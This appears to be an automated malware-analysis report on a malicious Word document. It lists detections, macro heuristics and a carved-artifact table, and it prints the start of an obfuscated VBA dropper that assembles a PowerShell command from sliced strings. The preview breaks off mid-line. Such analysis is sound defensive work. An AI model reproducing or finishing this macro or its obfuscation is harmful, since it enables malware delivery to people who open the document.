Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK: T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro attempts to execute a PowerShell command, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6550168-0' further supports its role as a dropper.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6573679-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6573679-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 242516 bytes | 4dc2186c2528d8c988b36f9aa0bf6dcf83eb03ef2f0c96f20ec1329ff90f72c7 |

Preview script (first 1,000 lines of the extracted script; the preview is truncated by the analyzer and the obfuscated VBA is shown exactly as carved, one statement per line):

```vba
Attribute VB_Name = "iqDnpbAGZQXl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zlfIH()
On Error Resume Next
llquWbwT = (sLsLFCT - CDbl(918853) + lPBjvEDOz + Fix(uiLQqpizK / CLng(385096 * Sqr(ZZsviLGDMs))) - 889870 / Sin(kDEkZQpqj - fXsEkKcUCd - 964970 + CLng(sjHLW)) * 636933 * Fix(918853))
WRjzJ = "cKdsDm9tZ1xMQnowershell ((GDyueNxA'(Jxu3JxXySvgYqIhOF6d0g18StfbwJ"
vmRari = CStr(Left(Right(WRjzJ, 52), 13)) + Left(Right(WRjzJ, 31), 8) + CStr(Left(Right(WRjzJ, 36), 1))
jikrdLp = Chr(43)
jmUCWHAU = "zxPff65z6JxuhJeVdguMW"
qDsrQEj = Left(Right(jmUCWHAU, 12), 5) + CStr(Left(Right(jmUCWHAU, 20), 1)) + CStr(Left(Right(jmUCWHAU, 3), 1))
XlrRcB = Chr(43)
oSvohjLD = "zJxff65z67YYJxuRnsEMW9auepf"
YkaPWsfTzG = Left(Right(oSvohjLD, 15), 6) + Left(Right(oSvohjLD, 26), 2) + Left(Right(oSvohjLD, 4), 1)
rQjbUMZBjhv = Chr(43)
hRZHCQP = "zxuff65z67YJxuaJdgEM'9ac"
vGLYupzRqiq = CStr(Left(Right(hRZHCQP, 13), 5)) + CStr(Left(Right(hRZHCQP, 23), 2)) + CStr(Left(Right(hRZHCQP, 4), 1))
GDwSYL = Chr(43)
KPEUNY = "T'3"
ulSMTjwQf = Left(Right(KPEUNY, 2), 1)
aVGcsiILTk = Chr(43)
zYUZPMkjOY = (HFbGzzLDtM - CDbl(140075) + zPlzAJcl + Fix(PTbnE / CLng(182780 * Sqr(PrwolFrd))) - 491146 / Sin(XtqCJRqwfVY - nSMbG - 395864 + CLng(XXodnBUh)) * 389995 * Fix(140075))
ritfFjzWc = "zxPff65z6JxudJeVdguMW"
lSSLGijc = Left(Right(ritfFjzWc, 12), 5) + CStr(Left(Right(ritfFjzWc, 20), 1)) + CStr(Left(Right(ritfFjzWc, 3), 1))
hNlSDSba = Chr(43)
plVutXu = "Pffpnz67YY6HeVdfpMW9acepJxuasd = &(e2JGRt3ODDKexxNqhNp"
afzwV = CStr(Left(Right(plVutXu, 30), 12)) + CStr(Left(Right(plVutXu, 52), 3)) + Left(Right(plVutXu, 8), 1) + CStr(Left(Right(plVutXu, 39), 2))
MtqoWNKmW = Chr(43)
NzFrvN = "x'IPff65efpJY6HeVd"
mvlSkW = CStr(Left(Right(NzFrvN, 10), 4)) + Left(Right(NzFrvN, 18), 1) + Left(Right(NzFrvN, 17), 1)
jTKrUZb = Chr(43)
kwhPmB = "Tb'u3u"
PNssacnznzM = CStr(Left(Right(kwhPmB, 4), 2))
uGLXaPGRXq = Chr(43)
zSXiXZHnRFS = (ZYEVoN - CDbl(254695) + IlAGtX + Fix(zLEfT / CLng(341653 * Sqr(SYtpzUps))) - 601801 / Sin(YWnAGTiv - GiZqMzMdLUZ - 217078 + CLng(illwqAiPVTX)) * 760280 * Fix(254695))
Wjchbla = "zfPff65z6JxueeeVdgpMW"
rqFHTjVlCJ = Left(Right(Wjchbla, 12), 5) + CStr(Left(Right(Wjchbla, 20), 1)) + CStr(Left(Right(Wjchbla, 3), 1))
VONAWvazIC = Chr(43)
PWpVLwSGjSr = "T'3"
rMjmRoU = Left(Right(PWpVLwSGjSr, 2), 1)
JOthD = Chr(43)
ksDqm = "xuIPff65'efJY6HeVd"
nUGZX = CStr(Left(Right(ksDqm, 10), 4)) + Left(Right(ksDqm, 18), 1) + Left(Right(ksDqm, 17), 1)
hQzzZcj = (uiaTYk - CDbl(523179) + NwlKho + Fix(jfRdBwbHv / CLng(479372 * Sqr(ZHpZFtBwYSP))) - 104894 / Sin(zYMHW - AHNzdDh - 545201 + CLng(hvaiinn)) * 194538 * Fix(523179))
HiEOiEUITa = Chr(43)
BCkBZ = "zxPff65z6JxupJeVdguMW"
CzPVwT = Left(Right(BCkBZ, 12), 5) + CStr(Left(Right(BCkBZ, 20), 1)) + CStr(Left(Right(BCkBZ, 3), 1))
UwZbQarulOj = Chr(43)
SkmbZasfqr = "PfceJz67YY6HuVdgEMWJxuw-objeTSj6M22UxJGRt3"
IqvIXvUuSKu = Left(Right(SkmbZasfqr, 23), 9) + Left(Right(SkmbZasfqr, 40), 3) + Left(Right(SkmbZasfqr, 6), 1) + Left(Right(SkmbZasfqr, 30), 1)
RkaNMn = Chr(43)
BOIGibrU = "T'3"
XjGNZ = Left(Right(BOIGibrU, 2), 1)
fRiWkSG = Chr(43)
ilzwazNmo = "zJxff65z67Y'JxufdgEMu9ac"
ZRTHpsai = CStr(Left(Right(ilzwazNmo, 13), 5)) + CStr(Left(Right(ilzwazNmo, 23), 2)) + CStr(Left(Right(ilzwazNmo, 4), 1))
aKDNKfAi = Chr(43)
GWvZt = (fCVEU - CDbl(184285) + irCUsSLOrk + Fix(AzoCs / CLng(264085 * Sqr(PdRMtYL))) - 44339 / Sin(nQGWa - kWsKf - 557303 + CLng(XvRjEPVWu)) * 427800 * Fix(184285))
IAWtqSDJEB = "zxPff65z6JxupJeVdguMW"
YFzHTJWZ = Left(Right(IAWtqSDJEB, 12), 5) + CStr(Left(Right(IAWtqSDJEB, 20), 1)) + CStr(Left(Right(IAWtqSDJEB, 3), 1))
QQGFiAVjNHl = Chr(43)
Ncpsv = "u3uzJxff6"
NjqhWirHW = Left(Right(Ncpsv, 5), 2) + CStr(Left(Right(Ncpsv, 9), 1))
iBNvCFAZs = Chr(43)
iCpiGBcd = "u3uzIeJx65z6"
vzYipTrCC = Left(Right(iCpiGBcd, 7), 3) + CStr(Le ...
(truncated)
```